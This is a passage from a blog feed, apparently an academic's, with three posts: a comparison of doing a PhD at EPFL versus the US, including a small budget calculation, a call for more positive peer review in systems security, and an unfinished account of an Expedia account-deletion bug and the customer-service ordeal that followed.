&lt;tr&gt;&lt;td&gt;Public transport&lt;/td&gt;
&lt;td&gt;960&lt;/td&gt;
&lt;td&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Car (insurance, devaluation, gas)&lt;/td&gt;
&lt;td&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;1,000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Free budget (food, leisure, travel)&lt;/td&gt;
&lt;td&gt;29,560&lt;/td&gt;
&lt;td&gt;3,060&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
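&lt;p&gt;The free-budget rows are simply salary minus taxes minus the fixed yearly
costs; as a quick sanity check, here is a small Python sketch (the
&lt;tt&gt;free_budget&lt;/tt&gt; helper and the rounded figures are taken from the table
above, so treat it as an approximation, not an exact cost model):&lt;/p&gt;

```python
# Rough yearly free-budget estimate: salary minus a flat tax rate
# and the fixed yearly costs from the comparison table above.
def free_budget(salary, tax_rate, fixed_costs):
    """Return salary minus taxes minus the sum of fixed yearly costs."""
    return salary - salary * tax_rate - sum(fixed_costs)

# EPFL (CHF): housing, health insurance, fees, fiber+mobile, public transport
epfl = free_budget(52_400, 0.10, [12_000, 3_600, 200, 840, 960])

# Purdue (US$): housing, health insurance, fees, fiber+mobile, car
purdue = free_budget(19_000, 0.10, [9_600, 600, 2_000, 840, 1_000])

print(epfl, purdue)  # 29560.0 3060.0, matching the table's free-budget rows
```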
&lt;p&gt;The huge difference in salary between the US and Switzerland results in
a key advantage: you do not have to do internships, but you can. Instead
of having to hunt for an internship each summer (which may delay your PhD
if you have to take purely engineering-focused positions), you can pick
and choose what kind of internships you want to do during your PhD. I
encourage my students to intern at least once during the PhD, but
internships are not mandatory. A research-oriented
internship during your PhD allows you to compare academic to industry
research and to check out potential employers (or helps you decide that
you want to stay in academia).&lt;/p&gt;
&lt;p&gt;Unlike in the US, you are considered an employee and therefore also
get 4 weeks of paid holiday per year. Taking these holidays
to relax is essential to succeeding at your PhD. I continuously
encourage my students to take the necessary time off and to push towards
a sustainable work/life balance.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-to-day-life"&gt;
&lt;h2&gt;Day to day life&lt;/h2&gt;
&lt;p&gt;A big difference between the US and Switzerland is eating out. In
Switzerland, eating out is a rarer occasion, often with friends, while in
the US it is much more common to grab a bite somewhere. When eating out,
a single course costs between 20 and 30 CHF, drinks not included. In the
US, you can often eat below 10 US$. In Switzerland, many students cook
dinner themselves and on weekends invite friends over to offset the
higher restaurant costs. A meal at one of the many EPFL cafeterias is
around 10 CHF.&lt;/p&gt;
&lt;p&gt;Compared to the US, public transport is very well built and the vast
majority of students do not own a car. You can take trains and buses
almost anywhere. Transport prices are high but reasonable. Taxis and
Ubers are rarely used. It is also common to bike to work (and around).&lt;/p&gt;
&lt;p&gt;Lausanne is in the French-speaking part of Switzerland, but English is
widely spoken. Switzerland is a country with four national
languages, so linguistic diversity is very commonplace. In fact,
Lausanne, as the Olympic capital, has more than 40% foreigners who bring
an urban and highly European flair to the city. With around 200,000
inhabitants, Lausanne is the fourth largest city in Switzerland and
feels comparable to (i.e., as urban as) a US city of around 1-2 million
inhabitants. There is no need to learn French during your PhD, but
language courses are a great way to mingle with locals and to appreciate
the culture. Language tandems (two students wanting to learn opposite
languages) are a great way to meet many different and interesting
people. In addition to EPFL’s free language courses, my group will pay
for French language courses you want to take, but they are of course not
mandatory. The language in the group is English.&lt;/p&gt;
&lt;p&gt;The EPFL campus is situated right outside Lausanne, close to Lake
Geneva. Atypically for European universities, EPFL follows the design of
US-style campuses: the university buildings are not distributed across
the city but sit close to each other, allowing students from different
fields to interact freely. Lausanne is a city with a
very high quality of life. As the Olympic capital, it offers lots of
opportunities for leisure activities. The Lavaux region offers ample
hiking opportunities in the vineyards, the mountains are close for more
hiking and skiing, and the beach along the lake offers opportunities for
BBQ and water sports.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="phd-research-and-edic-requirements"&gt;
&lt;h2&gt;PhD research and EDIC requirements&lt;/h2&gt;
&lt;p&gt;As a PhD student, you will predominantly focus on your research and be
involved in research projects of your peers. The PhD culminates with a
thesis that serves as proof that you can conduct independent academic
research. Usually, a thesis consists of 3-4 publications at scientific
conferences that drill deep into a specific topic.&lt;/p&gt;
&lt;p&gt;In addition to the scientific work (which is the core goal), you will
have to fulfill &lt;a class="reference external" href="https://www.epfl.ch/education/phd/edic-computer-and-communication-sciences/edic-for-phd-students/"&gt;several other
requirements&lt;/a&gt;.
At EDIC, you have to pass a depth course in your first year with a grade
of more than 5 (out of 6). &lt;a class="reference external" href="https://www.epfl.ch/education/phd/edic-computer-and-communication-sciences/edic-computer-and-communication-sciences/edic-course-book/#Depth"&gt;There’s a list of available
courses&lt;/a&gt;
and my students generally pick one of the systems courses along with
some other courses. In total, students need to achieve 30 ECTS credits
(30 ECTS credits is considered a full time semester load for a bachelor
or master student who only takes classes) throughout their PhD,
generally in the first 2 years. Compared to US programs, the course load
at EPFL is extremely light and usually consists of 3 classes (18 ECTS
credits) and 2 semester projects (12 ECTS credits; projects are usually
part of the PhD research). This is much lower than at many US
universities, where students usually have to take several semesters'
worth of classes.&lt;/p&gt;
&lt;p&gt;At the end of your first year, you must have passed the depth course and
completed two semester projects. Afterwards, you must pass the candidacy
exam which asks you to select, analyze, and discuss three research
papers in your research area in front of a faculty committee. This
candidacy exam tests if you’re fit for PhD level research.&lt;/p&gt;
&lt;p&gt;In addition to your research duties, you will be a teaching assistant
throughout most of your PhD (except for the first, last, and 8th
semester of your PhD). Teaching is well integrated with research at EPFL,
and bachelor and master teaching lets you learn to interact with a
group of 20-30 bright students and help them with their class work.
Classes are often in your area of research, allowing you to recruit
students for bachelor and master projects/theses that will then help you
on your research projects. At EPFL, bachelor and master students have to
conduct research projects as part of their education. These students are
often a great source of help for your projects and allow you to practice
your advising skills.&lt;/p&gt;
&lt;p&gt;EPFL labs are generally very well funded and any hardware that you need
for your research, e.g., access to a cluster, compute resources, or
special hardware, is paid for along with trips to conferences for
networking. The funding decisions lie within the powers of the group
leaders. My rule of thumb is that first author students attend the
conference to present the paper. For all other students we decide based
on need and opportunity. I generally equip my PhD students with desktops
and laptops based on their computing needs.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fellowship-versus-admissible"&gt;
&lt;h2&gt;Fellowship versus Admissible&lt;/h2&gt;
&lt;p&gt;The EDIC doctoral school distinguishes between fellowship candidates
(their first year is paid by the school and they can choose up to
two labs to do semester projects in) and admissible candidates (they are
hired directly by a lab and do the semester projects in these labs). A
fellowship is a recognition of often excellent prior research work or
excellent grades. In general, labs at EPFL are very well funded and the
number of PhD students is usually restricted by the bandwidth of the
faculty and not the admissible/fellowship status of the student. The
HexHive lab is well financed through EPFL’s base funding as well as
generous funding from different funding agencies and several industry
partners.&lt;/p&gt;
&lt;p&gt;Whether you received a fellowship or an admissible evaluation, you
should reach out to the faculty that you are interested in working with
and try to talk to them about potential research projects and whether they
are a good fit for you. If you’re admissible, you should just start a
little earlier.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="interactions-in-the-hexhive-lab"&gt;
&lt;h2&gt;Interactions in the HexHive lab&lt;/h2&gt;
&lt;p&gt;All research labs are different; we in the HexHive lab are
extremely collaborative. I use several tiers of interaction. We
have a group Slack with open channels for all projects and discussions.
Students can ask questions at any time or join ongoing discussions. Once
a day, we each write a quick summary about the status of our project and
if we’re stuck (this serves as a quick daily scrum opportunity for me to
check in if needed). At least once a week, we discuss each student’s
project in depth for at least 30 minutes. In addition, one student will
present her or his project (or crazy idea) in front of the full group
for general feedback. Each project has a student lead with 1-2 other
students joining in and being responsible for their parts. You will
spend 80% of your research time on your own project and 20% on
other projects, broadening your scope. In addition, we have frequent
social gatherings, a weekly group lunch, and often hang out for coffee
or informal interactions. I also encourage students to reach out
whenever they have questions.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="further-reading"&gt;
&lt;h2&gt;Further reading&lt;/h2&gt;
&lt;p&gt;This is of course not the only blog post about getting started on a PhD in
Europe. I highly recommend &lt;a class="reference external" href="https://andreas-zeller.info/2020/07/01/whats-it-like-to-be-a-phd-student-in-germany.html"&gt;Andreas Zeller’s post on doing a PhD in Germany&lt;/a&gt;;
Switzerland is of course famous for its amazing cheese instead of sausages. In
addition you may find the information about &lt;a class="reference external" href="https://studyinginswitzerland.com/phd-in-switzerland/"&gt;doing a PhD in Switzerland&lt;/a&gt; useful along with
&lt;a class="reference external" href="https://www.epfl.ch/education/phd/edic-computer-and-communication-sciences/edic-for-phd-students/"&gt;details of the EDIC program&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="PhD"></category><category term="EPFL"></category></entry><entry><title>Positive reviewing in software security</title><link href="/blog/2019/1207-ndsspc.html" rel="alternate"></link><published>2019-12-07T05:01:00-05:00</published><updated>2019-12-07T05:01:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2019-12-07:/blog/2019/1207-ndsspc.html</id><summary type="html">&lt;p&gt;Yesterday we concluded the NDSS20 PC meeting. In &lt;em&gt;total, 12% of papers were accepted, 6% now have a short fuse major revision opportunity&lt;/em&gt;, in line with other top tier conferences.
The PC chairs handled the meeting well, striving for positivity and feedback for the authors.
Overall, this was a great …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Yesterday we concluded the NDSS20 PC meeting. In &lt;em&gt;total, 12% of papers were accepted, 6% now have a short fuse major revision opportunity&lt;/em&gt;, in line with other top tier conferences.
The PC chairs handled the meeting well, striving for positivity and feedback for the authors.
Overall, this was a great experience with lots of interesting discussions and arguments.&lt;/p&gt;
&lt;p&gt;Looking at the subset of systems/software security papers, I'm a little worried.
In total, I positively bid on 53 papers (during the bidding phase of the review process, reviewers indicate which papers they would like to review).
Note that this set does not include papers I have a conflict of interest with.
Also note that this selection is highly biased towards what I am interested in.
I'm therefore focusing only on the subset of papers I am a) interested in and b) not conflicted with. Your mileage will vary.&lt;/p&gt;
&lt;p&gt;Of the papers in my bid, only 6/53 papers received an accept/major revision decision.
This results in a sad maximum 11% acceptance rate (assuming the unlikely event that we would accept all revisions).
Of the six papers moving forward, I reviewed all of them (in total, I reviewed 17 papers this round). Three of the six I championed, for the others I argued at least for a major revision.
If all five major revisions are accepted, this will result in, &lt;em&gt;at best, an 11% acceptance rate in my field. At worst, we will have a 2% acceptance rate.&lt;/em&gt;
&lt;strong&gt;I strongly believe that there are more good papers in this community.&lt;/strong&gt;
Let us find ways how to distill these good papers and bring them to light!&lt;/p&gt;
&lt;p&gt;Many of my reviewer peers are complaining about the low acceptance rate in software/systems security.
Unfortunately, it is extremely easy to reject papers as a reviewer.
Assume you are a reviewer. If, every time you review a set of papers for a conference, only two papers out of 20 are acceptable, then you may want to adjust your approach.
I'm not talking about the occasional batch of bad papers. If this happens every time you review, you may either want to reconsider your bidding strategy (your area may not be of interest to others) or your review scores (you are too tough on papers).
At top tier conferences, the program is made out of papers from many different sub areas.
These areas change over time, as new areas become dominant, others lose importance.&lt;/p&gt;
&lt;p&gt;My (informal) observation is that systems/software people are too tough on papers in their area.
As systems people we not only assess the idea and the design of the system but also how well it is implemented and evaluated.
We get satisfaction by finding flaws in the design (&amp;quot;ah, you did not consider that the blubb bit remains writable&amp;quot;), by asking for massively more evaluation (&amp;quot;well, they only tested their system on 23597 applications and 253 million lines of code&amp;quot;), or by comparing to marginally related work whose underlying assumptions may no longer be valid (&amp;quot;In 1983 there was a paper on information flow control that solved the problem for programs up to 200 lines of code&amp;quot;).
&lt;em&gt;While pointing out such issues is great (and they should be clearly discussed in the paper), they can often be handled as a major revision.&lt;/em&gt;
I've been guilty of all these fallacies myself. When considering these flaws, assess if they are fixable and remain positive.&lt;/p&gt;
&lt;p&gt;Being part of the review task force at Usenix SEC20 (the review task force supports the PC chairs by reading reviews of a large chunk of papers and guiding the online discussions), I saw how people in other communities fight for acceptance of papers in their area.
The general vibe was much more positive and reviewers were looking for reasons to accept a paper, not to reject it.&lt;/p&gt;
&lt;p&gt;So, software/systems security folks: &lt;strong&gt;find reasons to accept the paper.&lt;/strong&gt;
Let's turn our systems skills into an advantage that makes our field stronger.
We can shape the program of conferences and accept more papers that are closer to our interest.
Stop worrying about the occasional false positive where a bad paper is accepted, and focus instead on the broader picture of what is interesting in our area.
As we carefully review papers, we can guide authors on how to improve their papers.
Augment your review with facts that you liked about the paper, letting authors know the strengths of their paper along with the weaknesses.
When you make your final judgment, &lt;em&gt;consider the full set of pros and cons. For the weaknesses, consider if they are fixable.&lt;/em&gt;
Give the authors clear instructions on what you think the weaknesses are and point them at how they can fix them.
Then, fight for acceptance instead of rejection. &lt;strong&gt;The next deadline is coming up soon!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2019/1207/reviewpositive.jpg" /&gt;&lt;/p&gt;
</content><category term="Academia"></category><category term="NDSS"></category><category term="SEC"></category><category term="review"></category></entry><entry><title>Expedia: from software bug to customer service nightmare, a modern Odyssey</title><link href="/blog/2019/0701-expedia.html" rel="alternate"></link><published>2019-07-01T22:10:00-04:00</published><updated>2019-07-01T22:10:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2019-07-01:/blog/2019/0701-expedia.html</id><summary type="html">&lt;p&gt;While traveling through Europe, I logged into my Expedia.com account and
something odd happened: instead of being logged in, the Expedia system decided
to redirect me to Expedia.ch and created a new account. Oddly, it copied all my
credit card details, account information, frequent traveller details, and
individual …&lt;/p&gt;</summary><content type="html">&lt;p&gt;While traveling through Europe, I logged into my Expedia.com account and
something odd happened: instead of being logged in, the Expedia system decided
to redirect me to Expedia.ch and created a new account. Oddly, it copied all my
credit card details, account information, frequent traveller details, and
individual travellers to this new (unwanted) account. After this glitch, I ended
up with two accounts with the same username and the same password: one for
Expedia.com, the other for Expedia.ch. This is likely some form of GDPR
violation, as the data of multiple Europeans, including their passport
information, was copied to a different company (Expedia.com and Expedia
independent companies that should not have access to each other's data).&lt;/p&gt;
&lt;p&gt;Most of the time when I logged in, I ended up in my Expedia.com account that had
all my travel details, my previous itineraries, my reservations, and my points.
But every now and then, I ended up in the empty Expedia.ch account clone which
was annoying. Additionally, I received unwanted emails from the clone Expedia.ch
account.&lt;/p&gt;
&lt;p&gt;So I set out to delete the obsolete Expedia.ch account, which turned into an
interesting Odyssey in 30 acts. What started as a software bug became a huge
customer service failure: 30+ interactions with customer service, Expedia losing
all my data and all my collected points, and, in the end, offering me 3,000
points and $75 as compensation.&lt;/p&gt;
&lt;p&gt;Instead of keeping an account and my data private, Expedia created a fake
account. Instead of deleting the fake account, Expedia deleted both accounts.
Instead of them reactivating my wrongfully deleted account I had to create a new
account. Instead of adding points to the new account, Expedia deleted the new
account again. After 30+ interactions over two months with the massively
incompetent support, I lost about 10,000 points and my status, but received $75
and 3,000 points (about $100 total) in compensation. Go Expedia!&lt;/p&gt;
&lt;p&gt;So, in conclusion, I would strongly recommend against using Expedia. If you
have to, try to use points as quickly as possible. Keep emails and proof of
interactions. If you can, move to a competitor. Unfortunately,
there are not many alternatives to Expedia due to the massive
consolidation in the travel portal business. The main alternative appears to be
booking.com. But first read on about the individual acts and interactions with the
crappy support:&lt;/p&gt;
&lt;div class="section" id="act-1-expedia-com-may-9"&gt;
&lt;h2&gt;Act 1: Expedia.com: May 9&lt;/h2&gt;
&lt;p&gt;I contacted the gold support team and asked them to delete the unwanted
Expedia.ch account. After several days I received a reply with a canned response
that accounts cannot be merged. I responded that I'd like to remove the cloned
account as it's a bug in their system.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-2-expedia-com-may-20"&gt;
&lt;h2&gt;Act 2: Expedia.com: May 20&lt;/h2&gt;
&lt;p&gt;This time, someone apparently read my email and mentioned that I must contact
Expedia.ch. So I contacted Expedia.ch and described the situation, again. I was
told to expect an answer in 1-2 days.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-3-expedia-ch-may-23"&gt;
&lt;h2&gt;Act 3: Expedia.ch: May 23&lt;/h2&gt;
&lt;p&gt;I received a reply that, due to data privacy laws, accounts cannot be
deactivated over email. The email also mentioned that I should call a phone
number in Germany. This is when I learned that Expedia.ch accounts are handled
by Expedia.de. So I called, and described the situation, again.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-4-expedia-de-may-28"&gt;
&lt;h2&gt;Act 4: Expedia.de: May 28&lt;/h2&gt;
&lt;p&gt;After a short waiting period, I got a competent call center agent who walked me
through the deactivation process of the dead account. He mentioned several times
that it was odd that he could see bookings from the Expedia.com account but
assured me that the German team has no access whatsoever to the Expedia.com
account and deleting the Expedia.ch account will not influence or disturb the
Expedia.com account. In any case, he assured me that if an account had active
bookings this account could not be deleted under any circumstances and that the
system would not allow it.&lt;/p&gt;
&lt;p&gt;He went ahead and deleted the Expedia.ch account and told me I would get a
confirmation mail.&lt;/p&gt;
&lt;p&gt;I never received a confirmation mail. Instead, both my accounts were deleted.&lt;/p&gt;
&lt;p&gt;Let me repeat: both the dead unwanted account and my active account with points
and several active reservations were deleted.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-5-expedia-de-may-28"&gt;
&lt;h2&gt;Act 5: Expedia.de: May 28&lt;/h2&gt;
&lt;p&gt;I called again and complained that my account had just unwillingly been deleted.
He checked and saw that both accounts had been deactivated and assured me that
this should not have been possible.&lt;/p&gt;
&lt;p&gt;The agent told me that he would look into the case and fix it. My hopes were up
and I thought that the German agents were helpful, capable, and would remedy the
situation. With my hopes up we ended the call.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-6-expedia-de-may-28"&gt;
&lt;h2&gt;Act 6: Expedia.de: May 28&lt;/h2&gt;
&lt;p&gt;I received a voice mail from the previous agent who explained that they could
not do anything from Expedia.de as my account was at Expedia.com and that they
cannot access those accounts.&lt;/p&gt;
&lt;p&gt;He mentioned that there is a mediation service as part of the European service
center that I should contact. He sounded genuinely unhappy about the situation,
which, unfortunately, did not help me much.&lt;/p&gt;
&lt;p&gt;So, I followed his advice and contacted the mediation service, and explained the
whole situation, again.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-7-expedia-com-may-29"&gt;
&lt;h2&gt;Act 7: Expedia.com: May 29&lt;/h2&gt;
&lt;p&gt;I contacted the internal Expedia customer service (through a special email
address that I was given) and described the whole situation, again. After not
hearing back for a day, I contacted the regular customer support. From the
regular customer support, I received an email that I should call &lt;em&gt;as quickly as
possible&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;So I called, again.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-8-expedia-com-may-29"&gt;
&lt;h2&gt;Act 8: Expedia.com: May 29&lt;/h2&gt;
&lt;p&gt;When calling, I was told that all lines were busy and that the estimated wait
time was 20 minutes. I waited for an agent for 40 minutes, continuously being
told that my call was important and that my time was important. To be honest, it
did not feel as if they felt that my time was important.&lt;/p&gt;
&lt;p&gt;After finally reaching an agent (Jim), I explained the situation, again. I was told
that this cannot happen as accounts with active reservations cannot be deleted.
I explained the situation, again. He talked to his supervisor and told me that
this should not happen. It took a while before he realized that the bug was on
their end. When he did, he promised to escalate, inform next-level support,
and connect me.&lt;/p&gt;
&lt;p&gt;So I was connected. I waited on hold for 20 minutes, the next agent had no clue
and I explained the situation, again.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-9-expedia-com-may-29"&gt;
&lt;h2&gt;Act 9: Expedia.com: May 29&lt;/h2&gt;
&lt;p&gt;The agent (Jay this time) observed that both accounts were deleted and insisted
that deleting accounts with active reservations is not possible. He informed me
that reactivating deleted accounts is unfortunately not possible (another canned
response). I explained the whole situation, again, and, again, he understood
that the bug was on their end. Again, he talked to his supervisor, and, again,
promised to forward me to the next level.&lt;/p&gt;
&lt;p&gt;So I was connected. I waited on hold for 40 minutes, the next agent had no clue
and I explained the situation, again.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-10-expedia-com-may-30"&gt;
&lt;h2&gt;Act 10: Expedia.com: May 30&lt;/h2&gt;
&lt;p&gt;By the time I reached level 3 support (Sheryl this time), I had been on the
phone for 2 hours and 15 minutes. Sheryl told me that she was the last person
in line and that there were no higher-ups.&lt;/p&gt;
&lt;p&gt;Sheryl again told me that there is no way to delete an account with active
reservations. I explained the whole situation, again. She understood quickly
that the bug was on their end but mentioned that there is no way to
reinstantiate a closed account. She was unsure how to help me and mentioned that
she would escalate my issue to their internal help desk after collecting some
information.&lt;/p&gt;
&lt;p&gt;I mentioned that I had been on the phone for 2 hours 30 minutes by that time.
She responded that she'd first have to double check with the two hotels if my
registrations were still active on their end. She managed to check the first
reservation in 15 minutes. While working through the second reservation, we got
disconnected after about 3 hours on the phone.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-11-expedia-com-may-30"&gt;
&lt;h2&gt;Act 11: Expedia.com: May 30&lt;/h2&gt;
&lt;p&gt;I received an email from Sheryl that we unfortunately got disconnected and that
I should call back, referencing a case number so that the next agent could
continue the work. Interestingly, this email was signed &amp;quot;Expedia Corporate
Service&amp;quot;. When calling the provided number, the system informed me that
the expected wait time was 36 minutes. Given the massive amount of wait time for
the previous call I gave up, figuring I would try again the next day.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-12-expedia-com-may-31"&gt;
&lt;h2&gt;Act 12: Expedia.com: May 31&lt;/h2&gt;
&lt;p&gt;I received a call at 1am followed by another email from Expedia.com with a
different case number, mentioning that I should call back and that they were
trying to reinstantiate my account.&lt;/p&gt;
&lt;p&gt;So I called. Again, they were experiencing unexpected call volumes and I waited
20 minutes on hold until I spoke to Sarah, a nice agent trying to help me. After
referencing the case number (I tried my luck with the second case number first,
hoping they would reference the same case file -- I wonder if they garbage
collect these numbers) she placed me on hold again as she had to speak to
their helpdesk.&lt;/p&gt;
&lt;p&gt;After reading the massive amount of messages that had accumulated so far,
she decided to escalate.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-13-expedia-com-may-31"&gt;
&lt;h2&gt;Act 13: Expedia.com: May 31&lt;/h2&gt;
&lt;p&gt;After 20 minutes on hold (the call has now been going on for another hour), Anna
picked up and explained to me that she had taken over the call. She claimed that
deleting an Expedia.ch account can never influence an Expedia.com account as
these are two different systems. So I explained the whole situation, again.&lt;/p&gt;
&lt;p&gt;After another brief hold, she asked me for the number of open points, when I was
last able to log in, and the itinerary numbers of all open bookings. She
collected the information and informed me that she sent it to the &amp;quot;higher
department for account management&amp;quot; and that they would get back to me within 48
hours. She let me know that it was not my fault and that I would hear back on
how they would resolve the situation.&lt;/p&gt;
&lt;p&gt;Total time of call: 75 minutes.&lt;/p&gt;
&lt;p&gt;Let's eagerly await new information!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-14-expedia-ch-june-1"&gt;
&lt;h2&gt;Act 14: Expedia.ch: June 1&lt;/h2&gt;
&lt;p&gt;I received an email from Expedia.ch that they require the two Expedia account
numbers for further investigation. As Expedia has deleted my accounts and, when
trying to login, claims that there are no accounts associated with my email, I
responded that I don't have the account numbers. Interestingly, my two open
bookings are still tied to my phone number and the agents (both CH/DE and USA)
can look up my account information using my email address. I therefore told them
to leverage my email to look up my account.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-15-expedia-ch-june-1"&gt;
&lt;h2&gt;Act 15: Expedia.ch: June 1&lt;/h2&gt;
&lt;p&gt;Expedia.ch responded that they located my account and requested deletion (of the
CH account) again. I responded that I'm no longer worried about the deletion of my
Expedia.ch account but that my Expedia.com account was deleted as collateral
damage of their broken system. I'll await their answer.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-16-expedia-ch-june-2"&gt;
&lt;h2&gt;Act 16: Expedia.ch: June 2&lt;/h2&gt;
&lt;p&gt;I received a reply from Expedia.ch stating:
&amp;quot;May we kindly ask you to contact Expedia.com customer support as we can only
handle bookings from Germany, Austria and Switzerland.&amp;quot;
The reply again shows that they did not understand the situation, i.e., that
their deleting the Expedia.ch account caused the deletion of the Expedia.com
account that was somehow linked due to a bug in their system.&lt;/p&gt;
&lt;p&gt;I replied explaining the situation, again. Let's see what they do.&lt;/p&gt;
&lt;p&gt;Not that I started feeling like Don Quixote a long time ago, but the feeling
intensifies.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-17-expedia-com-june-2"&gt;
&lt;h2&gt;Act 17: Expedia.com: June 2&lt;/h2&gt;
&lt;p&gt;I received a note from corporate customer care that my original Expedia.com
account will be reactivated or my original points will be recredited. They will
inform me when the request succeeds.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-18-expedia-ch-june-3"&gt;
&lt;h2&gt;Act 18: Expedia.ch: June 3&lt;/h2&gt;
&lt;p&gt;I received a GDPR request from Expedia Germany asking me to confirm my right
to be forgotten. Interestingly, several agents told me that they can see all
data from my &amp;quot;deleted&amp;quot; Expedia.ch account and always made sure to say it was
deactivated, never deleted. So I'm a little confused about what they mean by
this GDPR request and what will happen if I react to it. Due to the previous
mess with the intermixed and interconnected accounts, I'm slightly worried about
what will happen if the account is not just deactivated but really deleted. Only
time (and the next several acts) will tell.&lt;/p&gt;
&lt;p&gt;Interestingly, this GDPR request brings up another question. As my personal
data, along with the personal data of 3 other travelers, was copied from
Expedia.com to Expedia.ch without my consent, I start to wonder if this
constitutes a severe GDPR violation.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-19-expedia-com-june-6"&gt;
&lt;h2&gt;Act 19: Expedia.com: June 6&lt;/h2&gt;
&lt;p&gt;After not having heard back anything from Mark in 4 work days, I reached out
again and asked if there was any progress on their end. The story continues.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-20-expedia-com-june-10"&gt;
&lt;h2&gt;Act 20: Expedia.com: June 10&lt;/h2&gt;
&lt;p&gt;After not having heard back for another couple of days, and with less than a
week remaining until my upcoming trip with two paid reservations on Expedia,
I've sent them another reminder. I also mentioned that I'm losing my patience (I
assume this would be clear after 20 interactions but hey, the customer service
department at Expedia may be a little slow). Let's see if I hear back.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-21-expedia-ch-june-11"&gt;
&lt;h2&gt;Act 21: Expedia.ch: June 11&lt;/h2&gt;
&lt;p&gt;Later in the afternoon I received a series of emails stating that I had
apparently changed the email address on my Expedia.com account. After a couple of
these emails, a name change from Mathias Payer to GSO, and an updated email of
&lt;a class="reference external" href="mailto:XXX&amp;#64;expedia.com"&gt;XXX&amp;#64;expedia.com&lt;/a&gt;, I
stopped receiving any more emails.&lt;/p&gt;
&lt;p&gt;A couple of minutes later, I received an email from Katrin Rothe from Expedia.de
regarding a GDPR request. She explained that linked accounts will automatically
be deleted together and that reactivating accounts is not possible.&lt;/p&gt;
&lt;p&gt;Her statements clearly contradicted several other previous statements and
reassurances that a) accounts with active reservations cannot be deleted, b) the
different Expedia entities are different and that the two accounts are
independent, and c) that the account could be reinstantiated.&lt;/p&gt;
&lt;p&gt;She instructed me to create a new account and they would 'reinstantiate my open
points'. So I created a new account. I also asked her about the state of my
reservations for next week which have already been paid and that I can no longer
access.&lt;/p&gt;
&lt;p&gt;I'm about 12-14 hours of emails, debugging, and pleading into this customer
service nightmare. Looking back I should have just given up after the first
interactions with the incompetent support but there was always this glimmer of
hope and the sunk cost fallacy. Given the massive amount of effort on my end for
a bug on their end, I feel that they have to compensate me for this issue (that
is fully on their end).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-22-expedia-com-ch-june-13"&gt;
&lt;h2&gt;Act 22: Expedia.com/ch: June 13&lt;/h2&gt;
&lt;p&gt;It has been another 2 days since my last interaction with the European Expedia
branch and 3 days with the US branch. I have not received a reply or confirmation regarding
my upcoming travel nor any compensation nor any other form of update. My newly
created account is empty (neither points nor reservations nor any other data).&lt;/p&gt;
&lt;p&gt;I therefore reached out both to the European and US Expedia customer service.
Interestingly, my travel on the two already paid reservations is coming up in 3
days. I reminded customer service of their crap/non-existing service.&lt;/p&gt;
&lt;p&gt;I'm thinking about filing a complaint regarding the GDPR violation and/or
customer service issues as this is (and has been for a while) beyond reasonable.
In the email, I told them that I'm expecting some form of compensation for my
efforts.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-23-expedia-june-13"&gt;
&lt;h2&gt;Act 23: Expedia.??: June 13&lt;/h2&gt;
&lt;p&gt;As Expedia is no longer replying to my emails and I can no longer access the
reservations through Expedia, I've reached out to the hotels directly to double
check if my (already paid) bookings are still active.&lt;/p&gt;
&lt;p&gt;One hotel replied in 10 minutes, the other after 4 hours. This is an amazing
difference compared to my experience with Expedia.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-24-expedia-com-june-14"&gt;
&lt;h2&gt;Act 24: Expedia.com: June 14&lt;/h2&gt;
&lt;p&gt;I received Expedia spam that I should join their fancy reward program. Sigh.
This is apparently how Expedia treats long term customers. I've sent them a
final reminder, following up on the previous cases to see if they reply or not.&lt;/p&gt;
&lt;p&gt;I haven't heard from Expedia since they completely removed the account reminders
and the half-dead account on June 11. Instead of following up and reinstantiating my
points, compensation, and status, they completely dropped all contact and I'm now
left without any confirmation for my reservations or any way to contact their
support as they no longer reply to any requests.&lt;/p&gt;
&lt;p&gt;Over the years I've seen bad customer support but treating high volume customers
this way seems like a bad business strategy.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="act-25-expedia-com-june-17"&gt;
&lt;h2&gt;Act 25: Expedia.com: June 17&lt;/h2&gt;
&lt;p&gt;Mark responded with an email that he was out of the office and that I should
have received an email explaining the situation. I'll be waiting for him to
